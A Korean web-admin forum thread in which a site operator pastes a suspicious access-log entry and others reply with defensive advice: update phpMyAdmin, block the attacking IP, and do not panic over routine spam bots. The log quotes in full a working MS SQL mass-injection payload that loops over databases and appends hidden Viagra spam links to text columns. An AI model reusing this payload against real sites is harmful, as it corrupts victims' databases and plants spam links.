지금 이거 해킹시도 맞죠????? 방금 연속적으로 로그기록에 이상한게 찍혔길래 복사했습니다

인터넷에서 찾아보니 인젝션공격이라고하는데 처음 보는 로그기록이라 무섭네요..

xe, 라이믹스 모두 방어기능이 되어있겠죠?

 

 

 

141.101.70.37 \ 404 5770 "http://google.com');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style=\"display:none\">pfizer viagra coupons <a href=\"http://www.liberitutti.info/page/viagra-coupons-from-pfizer\" rel=\"nofollow\">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''liberitutti.info'''' when 1 then ''''click'''' else ''''discount prescription coupons'''' end +''''</a> coupons for viagra 2016</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style=\"display:none\">pfizer viagra coupons <a href=\"http://www.liberitutti.info/page/viagra-coupons-from-pfizer\" rel=\"nofollow\">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''liberitutti.info'''' when 1 then ''''click'''' else ''''discount prescription coupons'''' end +''''</a> coupons for viagra 2016</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

 

  • ?

    그런 듯 하네요. XE나 라이믹스 단에서 이런 SQL을 실행이 불가능해요. 정말 불가능한 건지는 확실히 모르겠지만, FTP나 DB 서버가 뚫리지 않는 이상은 먹히지 않을 듯 하네요.

  • profile
    글쓰기 권한을 모든 사용자로 하면 금방 뚫립니다.
  • profile

    sysindexes 어쩌고 하는 것 보니까 MS SQL을 노린 것 같은데... 혹시 윈도우 서버인가요?

     

    SQL 인젝션이라면 XE는 웬만하면 안 뚫리지만, 서버에 다른 취약점이 있다면 위험할 수도 있어요. 예를 들어 호랑이 담배피던 시절에 한 번 다운받아 놓고 업데이트하지 않은 phpmyadmin이 깔려 있다거나...

  • profile ?
    우분투 마리아db쓰고있어요~ phpmyadmin는 업데이트..해본적이 없어서;; 한번 봐야겠네요 ㅎㅎ
  • profile ?

    phpmyadmin 4.0.x 버전을 쓰고있는데 이부분은 4.6.x 최신버전으로 올렸어요
    iptable 에서 공격들어온 ip는 막아두긴했는데
     

    tail -f  access. log 터미널에서 실시간으로 접속하는 기록현상을 보고있는데 어쩌다가 한번씩 저렇게 눈에 띄는데

    매일 로그기록을 24시간 감시할수도 없는노릇이고.. 불안하네요~

     

  • ?
    이런것만 보고도 해킹인지 아닌지 알수있나요??
  • ? ?
    저도 잘 모릅니다.

    다만, 평소에 찍히던 로그기록이라면 그냥 넘어갔을텐데
    처음보는 코드가 찍혔더라구요

    구글에 검색해보니 해킹이라고 나오더라구요. 외국포럼에서도 같은의견-
  • profile
    스팸봇입니다.
    해킹시도라 보아도 무방하지요
    저런스팸봇 유형은 수천가지가 넘어요.
    일상적인 것이라 그러려니 하고 넘어가시고,
    사이트 보안에 조금만 신경쓰시면 됩니다.